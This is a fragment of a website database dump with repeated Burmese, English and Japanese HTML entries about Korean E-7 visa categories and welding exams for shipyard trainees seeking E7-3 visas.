('activities', 0, 6, 151, 'ko', 0, '<img src=\"/sites/default/files/inline-images/E7-3_visa_korea.jpg\" data-align=\"center\" data-entity-uuid=\"e857287c-31d2-45cd-8d5c-c00dbf296637\" data-entity-type=\"file\"><p>ကိုရီးယားနိုင်ငံရှိ သင်္ဘောကျင်းကို E7-3 Viza နဲ့ သွားရောက်နိုင်ဖို့ သင်တန်းသားများကို ကိုရီးယားမှ လာရောက်၍ ဂဟေဆော် စာမေးပွဲ အမြန်လာရောက် စစ်ဆေးနိုင်ဖို့ လိုအပ်သည်များကို ရှင်းလင်း ပြောကြား</p><p>ကိုရီးယားနိုင်ငံရှိ သင်္ဘောကျင်းကို E7-3 Viza နဲ့ သွားရောက်နိုင်ဖို့ သင်တန်းသားများကို ကိုရီးယားမှ လာရောက်၍ ဂဟေဆော် စာမေးပွဲ အမြန်လာရောက် စစ်ဆေးနိုင်ဖို့ လိုအပ်သည်များကို ရှင်းလင်း ပြောကြား</p>', '', 'full_html'),
('activities', 0, 6, 214, 'en', 0, '<img src=\"/sites/default/files/inline-images/E7-3_visa_korea.jpg\" data-align=\"center\" data-entity-uuid=\"e857287c-31d2-45cd-8d5c-c00dbf296637\" data-entity-type=\"file\"><p>In order to get employed to the shipyard in Korea with an E7-3 Visa, the trainees are explained what is needed to quickly come and check the welding exam.</p>', '', 'full_html'),
('activities', 0, 6, 214, 'ja', 0, '<img src=\"/sites/default/files/inline-images/E7-3_visa_korea.jpg\" data-align=\"center\" data-entity-uuid=\"e857287c-31d2-45cd-8d5c-c00dbf296637\" data-entity-type=\"file\"><p>E7-3ビザを持って韓国の造船所で雇用されるためには、研修生に対して迅速に来て溶接試験を受けるために必要な内容が説明されます。</p>', '', 'full_html'),
('activities', 0, 6, 214, 'ko', 0, '<img src=\"/sites/default/files/inline-images/E7-3_visa_korea.jpg\" data-align=\"center\" data-entity-uuid=\"e857287c-31d2-45cd-8d5c-c00dbf296637\" data-entity-type=\"file\"><p>ကိုရီးယားနိုင်ငံရှိ သင်္ဘောကျင်းကို E7-3 Viza နဲ့ သွားရောက်နိုင်ဖို့ သင်တန်းသားများကို ကိုရီးယားမှ လာရောက်၍ ဂဟေဆော် စာမေးပွဲ အမြန်လာရောက် စစ်ဆေးနိုင်ဖို့ လိုအပ်သည်များကို ရှင်းလင်း ပြောကြား</p><p>ကိုရီးယားနိုင်ငံရှိ သင်္ဘောကျင်းကို E7-3 Viza နဲ့ သွားရောက်နိုင်ဖို့ သင်တန်းသားများကို ကိုရီးယားမှ လာရောက်၍ ဂဟေဆော် စာမေးပွဲ အမြန်လာရောက် စစ်ဆေးနိုင်ဖို့ လိုအပ်သည်များကို ရှင်းလင်း ပြောကြား</p>', '', 'full_html'),
('activities', 0, 7, 12, 'en', 0, '<div class=\"xdj266r x11i5rnm xat24cr x1mh8g0r x1vvkbs x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:&quot;Segoe UI Historic&quot;, &quot;Segoe UI&quot;, Helvetica, Arial, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;text-align:start;\" dir=\"auto\">E-7 visa</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:&quot;Segoe UI Historic&quot;, &quot;Segoe UI&quot;, Helvetica, Arial, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;text-align:start;\" dir=\"auto\">နိုင်ငံခြား နိုင်ငံသား အထူးစွမ်းရည်ဗီဇာပါ။ အဲမှာလည်း အမျိုးစား ထပ်ခွဲထားပါသေးတယ်</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:&quot;Segoe UI Historic&quot;, &quot;Segoe UI&quot;, Helvetica, Arial, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;text-align:start;\" dir=\"auto\">E-7-1 visa (Professionals) Managers တွေနဲ့ နယ်ပယ်တခုခုမှာ တတ်ကျွမ်းနားလည်တဲ့ ပညာရှင်တွေကို ပေးတဲ့ ဗီဇာပါ</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:&quot;Segoe UI Historic&quot;, &quot;Segoe UI&quot;, Helvetica, Arial, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;text-align:start;\" dir=\"auto\">. E-7-2 visa (Semi-professionals) Office အလုပ်တွေရယ် ဒါမှမဟုတ် service ပိုင်းဆိုင်ရာ တာဝန်ထမ်းဆောင်နေတဲ့သူတွေ ရရှိတဲ့ ဗီဇာပါ</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:&quot;Segoe UI Historic&quot;, &quot;Segoe UI&quot;, Helvetica, Arial, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;text-align:start;\" dir=\"auto\">. E-7-3 visa (Technicians) နည်းပညာ ပညာရှင်။ နည်းပညာပိုင်းဆိုင်ရာ နယ်ပယ်မှာ လုပ်ကိုင်နေသူတွေ ရရှိတဲ့ ဗီဇာပါ</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:&quot;Segoe UI Historic&quot;, &quot;Segoe UI&quot;, Helvetica, Arial, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;text-align:start;\" dir=\"auto\">E-7-4 visa (Experienced Technicians) အတွေ့ကြုံရှိ ပညာရှင်ဗီဇာပါ။ များသောအားဖြင့် လုပ်သက် ၅နှစ်အထက် အတွေ့ကြုံရှိ လုပ်သားတွေ E-9 ကနေ ပြောင်းလာရင် ရရှိတဲ့ ဗီဇာလည်း ဖြစ်ပါတယ်တဲ့ (အမှတ်အပေါ်မူတည်ပြီး ပေးတယ်လို့လည်း သိရပါတယ်)</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:&quot;Segoe UI Historic&quot;, &quot;Segoe UI&quot;, Helvetica, Arial, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;text-align:start;\" dir=\"auto\">E-7 visa</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:&quot;Segoe UI Historic&quot;, &quot;Segoe UI&quot;, Helvetica, Arial, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div class=\"text-align-justify\" style=\"font-family:inherit;text-align:start;\" dir=\"auto\">It\'s a special ability visa for foreign nationals. It\'s also divided into categories</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:&quot;Segoe UI Historic&quot;, &quot;Segoe UI&quot;, Helvetica, Arial, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div class=\"text-align-justify\" style=\"font-family:inherit;text-align:start;\" dir=\"auto\">E-7-1 visa (Professionals) This is a visa given to managers and experts in a particular field.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:&quot;Segoe UI Historic&quot;, &quot;Segoe UI&quot;, Helvetica, Arial, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div class=\"text-align-justify\" style=\"font-family:inherit;text-align:start;\" dir=\"auto\">E-7-2 visa (Semi-professionals) This is a visa for people who work in office jobs or service.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:&quot;Segoe UI Historic&quot;, &quot;Segoe UI&quot;, Helvetica, Arial, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div class=\"text-align-justify\" style=\"font-family:inherit;text-align:start;\" dir=\"auto\">E-7-3 visa (Technicians) Technicians. This is a visa for those working in the technical field</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:&quot;Segoe UI Historic&quot;, &quot;Segoe UI&quot;, Helvetica, Arial, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div class=\"text-align-justify\" style=\"font-family:inherit;text-align:start;\" dir=\"auto\">E-7-4 visa (Experienced Technicians) is an experienced technician visa. Usually, workers with more than 5 years of experience are transferred from E-9.</div></div>', '', 'full_html'),
('activities', 0, 7, 46, 'en', 0, '<p>E-7 visa</p><p>နိုင်ငံခြား နိုင်ငံသား အထူးစွမ်းရည်ဗီဇာပါ။ အဲမှာလည်း အမျိုးစား ထပ်ခွဲထားပါသေးတယ်</p><p>E-7-1 visa (Professionals) Managers တွေနဲ့ နယ်ပယ်တခုခုမှာ တတ်ကျွမ်းနားလည်တဲ့ ပညာရှင်တွေကို ပေးတဲ့ ဗီဇာပါ</p><p>E-7-2 visa (Semi-professionals) Office အလုပ်တွေရယ် ဒါမှမဟုတ် service ပိုင်းဆိုင်ရာ တာဝန်ထမ်းဆောင်နေတဲ့သူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-3 visa (Technicians) နည်းပညာ ပညာရှင်။ နည်းပညာပိုင်းဆိုင်ရာ နယ်ပယ်မှာ လုပ်ကိုင်နေသူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-4 visa (Experienced Technicians) အတွေ့ကြုံရှိ ပညာရှင်ဗီဇာပါ။ များသောအားဖြင့် လုပ်သက် ၅နှစ်အထက် အတွေ့ကြုံရှိ လုပ်သားတွေ E-9 ကနေ ပြောင်းလာရင် ရရှိတဲ့ ဗီဇာလည်း ဖြစ်ပါတယ်တဲ့ (အမှတ်အပေါ်မူတည်ပြီး ပေးတယ်လို့လည်း သိရပါတယ်)</p><p>E-7 visa</p><p>It\'s a special ability visa for foreign nationals. It\'s also divided into categories</p><p>E-7-1 visa (Professionals) This is a visa given to managers and experts in a particular field.</p><p>E-7-2 visa (Semi-professionals) This is a visa for people who work in office jobs or service.</p><p>E-7-3 visa (Technicians) Technicians. This is a visa for those working in the technical field</p><p>E-7-4 visa (Experienced Technicians) is an experienced technician visa. Usually, workers with more than 5 years of experience are transferred from E-9.</p>', '', 'full_html'),
('activities', 0, 7, 117, 'en', 0, '<p>E-7 visa</p><p>နိုင်ငံခြား နိုင်ငံသား အထူးစွမ်းရည်ဗီဇာပါ။ အဲမှာလည်း အမျိုးစား ထပ်ခွဲထားပါသေးတယ်</p><p>E-7-1 visa (Professionals) Managers တွေနဲ့ နယ်ပယ်တခုခုမှာ တတ်ကျွမ်းနားလည်တဲ့ ပညာရှင်တွေကို ပေးတဲ့ ဗီဇာပါ</p><p>E-7-2 visa (Semi-professionals) Office အလုပ်တွေရယ် ဒါမှမဟုတ် service ပိုင်းဆိုင်ရာ တာဝန်ထမ်းဆောင်နေတဲ့သူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-3 visa (Technicians) နည်းပညာ ပညာရှင်။ နည်းပညာပိုင်းဆိုင်ရာ နယ်ပယ်မှာ လုပ်ကိုင်နေသူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-4 visa (Experienced Technicians) အတွေ့ကြုံရှိ ပညာရှင်ဗီဇာပါ။ များသောအားဖြင့် လုပ်သက် ၅နှစ်အထက် အတွေ့ကြုံရှိ လုပ်သားတွေ E-9 ကနေ ပြောင်းလာရင် ရရှိတဲ့ ဗီဇာလည်း ဖြစ်ပါတယ်တဲ့ (အမှတ်အပေါ်မူတည်ပြီး ပေးတယ်လို့လည်း သိရပါတယ်)</p><p>E-7 visa</p><p>It\'s a special ability visa for foreign nationals. It\'s also divided into categories</p><p>E-7-1 visa (Professionals) This is a visa given to managers and experts in a particular field.</p><p>E-7-2 visa (Semi-professionals) This is a visa for people who work in office jobs or service.</p><p>E-7-3 visa (Technicians) Technicians. This is a visa for those working in the technical field</p><p>E-7-4 visa (Experienced Technicians) is an experienced technician visa. Usually, workers with more than 5 years of experience are transferred from E-9.</p>', '', 'full_html'),
('activities', 0, 7, 117, 'ja', 0, '<p>E-7 visa</p><p>နိုင်ငံခြား နိုင်ငံသား အထူးစွမ်းရည်ဗီဇာပါ။ အဲမှာလည်း အမျိုးစား ထပ်ခွဲထားပါသေးတယ်</p><p>E-7-1 visa (Professionals) Managers တွေနဲ့ နယ်ပယ်တခုခုမှာ တတ်ကျွမ်းနားလည်တဲ့ ပညာရှင်တွေကို ပေးတဲ့ ဗီဇာပါ</p><p>E-7-2 visa (Semi-professionals) Office အလုပ်တွေရယ် ဒါမှမဟုတ် service ပိုင်းဆိုင်ရာ တာဝန်ထမ်းဆောင်နေတဲ့သူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-3 visa (Technicians) နည်းပညာ ပညာရှင်။ နည်းပညာပိုင်းဆိုင်ရာ နယ်ပယ်မှာ လုပ်ကိုင်နေသူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-4 visa (Experienced Technicians) အတွေ့ကြုံရှိ ပညာရှင်ဗီဇာပါ။ များသောအားဖြင့် လုပ်သက် ၅နှစ်အထက် အတွေ့ကြုံရှိ လုပ်သားတွေ E-9 ကနေ ပြောင်းလာရင် ရရှိတဲ့ ဗီဇာလည်း ဖြစ်ပါတယ်တဲ့ (အမှတ်အပေါ်မူတည်ပြီး ပေးတယ်လို့လည်း သိရပါတယ်)</p><p>E-7 visa</p><p>It\'s a special ability visa for foreign nationals. It\'s also divided into categories</p><p>E-7-1 visa (Professionals) This is a visa given to managers and experts in a particular field.</p><p>E-7-2 visa (Semi-professionals) This is a visa for people who work in office jobs or service.</p><p>E-7-3 visa (Technicians) Technicians. This is a visa for those working in the technical field</p><p>E-7-4 visa (Experienced Technicians) is an experienced technician visa. Usually, workers with more than 5 years of experience are transferred from E-9.</p>', '', 'full_html'),
('activities', 0, 7, 118, 'en', 0, '<p>E-7 visa</p><p>နိုင်ငံခြား နိုင်ငံသား အထူးစွမ်းရည်ဗီဇာပါ။ အဲမှာလည်း အမျိုးစား ထပ်ခွဲထားပါသေးတယ်</p><p>E-7-1 visa (Professionals) Managers တွေနဲ့ နယ်ပယ်တခုခုမှာ တတ်ကျွမ်းနားလည်တဲ့ ပညာရှင်တွေကို ပေးတဲ့ ဗီဇာပါ</p><p>E-7-2 visa (Semi-professionals) Office အလုပ်တွေရယ် ဒါမှမဟုတ် service ပိုင်းဆိုင်ရာ တာဝန်ထမ်းဆောင်နေတဲ့သူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-3 visa (Technicians) နည်းပညာ ပညာရှင်။ နည်းပညာပိုင်းဆိုင်ရာ နယ်ပယ်မှာ လုပ်ကိုင်နေသူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-4 visa (Experienced Technicians) အတွေ့ကြုံရှိ ပညာရှင်ဗီဇာပါ။ များသောအားဖြင့် လုပ်သက် ၅နှစ်အထက် အတွေ့ကြုံရှိ လုပ်သားတွေ E-9 ကနေ ပြောင်းလာရင် ရရှိတဲ့ ဗီဇာလည်း ဖြစ်ပါတယ်တဲ့ (အမှတ်အပေါ်မူတည်ပြီး ပေးတယ်လို့လည်း သိရပါတယ်)</p><p>E-7 visa</p><p>It\'s a special ability visa for foreign nationals. It\'s also divided into categories</p><p>E-7-1 visa (Professionals) This is a visa given to managers and experts in a particular field.</p><p>E-7-2 visa (Semi-professionals) This is a visa for people who work in office jobs or service.</p><p>E-7-3 visa (Technicians) Technicians. This is a visa for those working in the technical field</p><p>E-7-4 visa (Experienced Technicians) is an experienced technician visa. Usually, workers with more than 5 years of experience are transferred from E-9.</p>', '', 'full_html'),
('activities', 0, 7, 118, 'ja', 0, '<p>E-7 visa</p><p>နိုင်ငံခြား နိုင်ငံသား အထူးစွမ်းရည်ဗီဇာပါ။ အဲမှာလည်း အမျိုးစား ထပ်ခွဲထားပါသေးတယ်</p><p>E-7-1 visa (Professionals) Managers တွေနဲ့ နယ်ပယ်တခုခုမှာ တတ်ကျွမ်းနားလည်တဲ့ ပညာရှင်တွေကို ပေးတဲ့ ဗီဇာပါ</p><p>E-7-2 visa (Semi-professionals) Office အလုပ်တွေရယ် ဒါမှမဟုတ် service ပိုင်းဆိုင်ရာ တာဝန်ထမ်းဆောင်နေတဲ့သူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-3 visa (Technicians) နည်းပညာ ပညာရှင်။ နည်းပညာပိုင်းဆိုင်ရာ နယ်ပယ်မှာ လုပ်ကိုင်နေသူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-4 visa (Experienced Technicians) အတွေ့ကြုံရှိ ပညာရှင်ဗီဇာပါ။ များသောအားဖြင့် လုပ်သက် ၅နှစ်အထက် အတွေ့ကြုံရှိ လုပ်သားတွေ E-9 ကနေ ပြောင်းလာရင် ရရှိတဲ့ ဗီဇာလည်း ဖြစ်ပါတယ်တဲ့ (အမှတ်အပေါ်မူတည်ပြီး ပေးတယ်လို့လည်း သိရပါတယ်)</p><p>E-7 visa</p><p>It\'s a special ability visa for foreign nationals. It\'s also divided into categories</p><p>E-7-1 visa (Professionals) This is a visa given to managers and experts in a particular field.</p><p>E-7-2 visa (Semi-professionals) This is a visa for people who work in office jobs or service.</p><p>E-7-3 visa (Technicians) Technicians. This is a visa for those working in the technical field</p><p>E-7-4 visa (Experienced Technicians) is an experienced technician visa. Usually, workers with more than 5 years of experience are transferred from E-9.</p>', '', 'full_html'),
('activities', 0, 7, 118, 'ko', 0, '<p>E-7 visa</p><p>နိုင်ငံခြား နိုင်ငံသား အထူးစွမ်းရည်ဗီဇာပါ။ အဲမှာလည်း အမျိုးစား ထပ်ခွဲထားပါသေးတယ်</p><p>E-7-1 visa (Professionals) Managers တွေနဲ့ နယ်ပယ်တခုခုမှာ တတ်ကျွမ်းနားလည်တဲ့ ပညာရှင်တွေကို ပေးတဲ့ ဗီဇာပါ</p><p>E-7-2 visa (Semi-professionals) Office အလုပ်တွေရယ် ဒါမှမဟုတ် service ပိုင်းဆိုင်ရာ တာဝန်ထမ်းဆောင်နေတဲ့သူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-3 visa (Technicians) နည်းပညာ ပညာရှင်။ နည်းပညာပိုင်းဆိုင်ရာ နယ်ပယ်မှာ လုပ်ကိုင်နေသူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-4 visa (Experienced Technicians) အတွေ့ကြုံရှိ ပညာရှင်ဗီဇာပါ။ များသောအားဖြင့် လုပ်သက် ၅နှစ်အထက် အတွေ့ကြုံရှိ လုပ်သားတွေ E-9 ကနေ ပြောင်းလာရင် ရရှိတဲ့ ဗီဇာလည်း ဖြစ်ပါတယ်တဲ့ (အမှတ်အပေါ်မူတည်ပြီး ပေးတယ်လို့လည်း သိရပါတယ်)</p><p>E-7 visa</p><p>It\'s a special ability visa for foreign nationals. It\'s also divided into categories</p><p>E-7-1 visa (Professionals) This is a visa given to managers and experts in a particular field.</p><p>E-7-2 visa (Semi-professionals) This is a visa for people who work in office jobs or service.</p><p>E-7-3 visa (Technicians) Technicians. This is a visa for those working in the technical field</p><p>E-7-4 visa (Experienced Technicians) is an experienced technician visa. Usually, workers with more than 5 years of experience are transferred from E-9.</p>', '', 'full_html'),
('activities', 0, 7, 153, 'en', 0, '<p>E-7 visa</p><p>နိုင်ငံခြား နိုင်ငံသား အထူးစွမ်းရည်ဗီဇာပါ။ အဲမှာလည်း အမျိုးစား ထပ်ခွဲထားပါသေးတယ်</p><p>E-7-1 visa (Professionals) Managers တွေနဲ့ နယ်ပယ်တခုခုမှာ တတ်ကျွမ်းနားလည်တဲ့ ပညာရှင်တွေကို ပေးတဲ့ ဗီဇာပါ</p><p>E-7-2 visa (Semi-professionals) Office အလုပ်တွေရယ် ဒါမှမဟုတ် service ပိုင်းဆိုင်ရာ တာဝန်ထမ်းဆောင်နေတဲ့သူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-3 visa (Technicians) နည်းပညာ ပညာရှင်။ နည်းပညာပိုင်းဆိုင်ရာ နယ်ပယ်မှာ လုပ်ကိုင်နေသူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-4 visa (Experienced Technicians) အတွေ့ကြုံရှိ ပညာရှင်ဗီဇာပါ။ များသောအားဖြင့် လုပ်သက် ၅နှစ်အထက် အတွေ့ကြုံရှိ လုပ်သားတွေ E-9 ကနေ ပြောင်းလာရင် ရရှိတဲ့ ဗီဇာလည်း ဖြစ်ပါတယ်တဲ့ (အမှတ်အပေါ်မူတည်ပြီး ပေးတယ်လို့လည်း သိရပါတယ်)</p><p>E-7 visa</p><p>It\'s a special ability visa for foreign nationals. It\'s also divided into categories</p><p>E-7-1 visa (Professionals) This is a visa given to managers and experts in a particular field.</p><p>E-7-2 visa (Semi-professionals) This is a visa for people who work in office jobs or service.</p><p>E-7-3 visa (Technicians) Technicians. This is a visa for those working in the technical field</p><p>E-7-4 visa (Experienced Technicians) is an experienced technician visa. Usually, workers with more than 5 years of experience are transferred from E-9.</p>', '', 'full_html'),
('activities', 0, 7, 153, 'ja', 0, '<p>E-7 visa</p><p>နိုင်ငံခြား နိုင်ငံသား အထူးစွမ်းရည်ဗီဇာပါ။ အဲမှာလည်း အမျိုးစား ထပ်ခွဲထားပါသေးတယ်</p><p>E-7-1 visa (Professionals) Managers တွေနဲ့ နယ်ပယ်တခုခုမှာ တတ်ကျွမ်းနားလည်တဲ့ ပညာရှင်တွေကို ပေးတဲ့ ဗီဇာပါ</p><p>E-7-2 visa (Semi-professionals) Office အလုပ်တွေရယ် ဒါမှမဟုတ် service ပိုင်းဆိုင်ရာ တာဝန်ထမ်းဆောင်နေတဲ့သူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-3 visa (Technicians) နည်းပညာ ပညာရှင်။ နည်းပညာပိုင်းဆိုင်ရာ နယ်ပယ်မှာ လုပ်ကိုင်နေသူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-4 visa (Experienced Technicians) အတွေ့ကြုံရှိ ပညာရှင်ဗီဇာပါ။ များသောအားဖြင့် လုပ်သက် ၅နှစ်အထက် အတွေ့ကြုံရှိ လုပ်သားတွေ E-9 ကနေ ပြောင်းလာရင် ရရှိတဲ့ ဗီဇာလည်း ဖြစ်ပါတယ်တဲ့ (အမှတ်အပေါ်မူတည်ပြီး ပေးတယ်လို့လည်း သိရပါတယ်)</p><p>E-7 visa</p><p>It\'s a special ability visa for foreign nationals. It\'s also divided into categories</p><p>E-7-1 visa (Professionals) This is a visa given to managers and experts in a particular field.</p><p>E-7-2 visa (Semi-professionals) This is a visa for people who work in office jobs or service.</p><p>E-7-3 visa (Technicians) Technicians. This is a visa for those working in the technical field</p><p>E-7-4 visa (Experienced Technicians) is an experienced technician visa. Usually, workers with more than 5 years of experience are transferred from E-9.</p>', '', 'full_html'),
('activities', 0, 7, 153, 'ko', 0, '<p>E-7 visa</p><p>နိုင်ငံခြား နိုင်ငံသား အထူးစွမ်းရည်ဗီဇာပါ။ အဲမှာလည်း အမျိုးစား ထပ်ခွဲထားပါသေးတယ်</p><p>E-7-1 visa (Professionals) Managers တွေနဲ့ နယ်ပယ်တခုခုမှာ တတ်ကျွမ်းနားလည်တဲ့ ပညာရှင်တွေကို ပေးတဲ့ ဗီဇာပါ</p><p>E-7-2 visa (Semi-professionals) Office အလုပ်တွေရယ် ဒါမှမဟုတ် service ပိုင်းဆိုင်ရာ တာဝန်ထမ်းဆောင်နေတဲ့သူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-3 visa (Technicians) နည်းပညာ ပညာရှင်။ နည်းပညာပိုင်းဆိုင်ရာ နယ်ပယ်မှာ လုပ်ကိုင်နေသူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-4 visa (Experienced Technicians) အတွေ့ကြုံရှိ ပညာရှင်ဗီဇာပါ။ များသောအားဖြင့် လုပ်သက် ၅နှစ်အထက် အတွေ့ကြုံရှိ လုပ်သားတွေ E-9 ကနေ ပြောင်းလာရင် ရရှိတဲ့ ဗီဇာလည်း ဖြစ်ပါတယ်တဲ့ (အမှတ်အပေါ်မူတည်ပြီး ပေးတယ်လို့လည်း သိရပါတယ်)</p><p>E-7 visa</p><p>It\'s a special ability visa for foreign nationals. It\'s also divided into categories</p><p>E-7-1 visa (Professionals) This is a visa given to managers and experts in a particular field.</p><p>E-7-2 visa (Semi-professionals) This is a visa for people who work in office jobs or service.</p><p>E-7-3 visa (Technicians) Technicians. This is a visa for those working in the technical field</p><p>E-7-4 visa (Experienced Technicians) is an experienced technician visa. Usually, workers with more than 5 years of experience are transferred from E-9.</p>', '', 'full_html'),
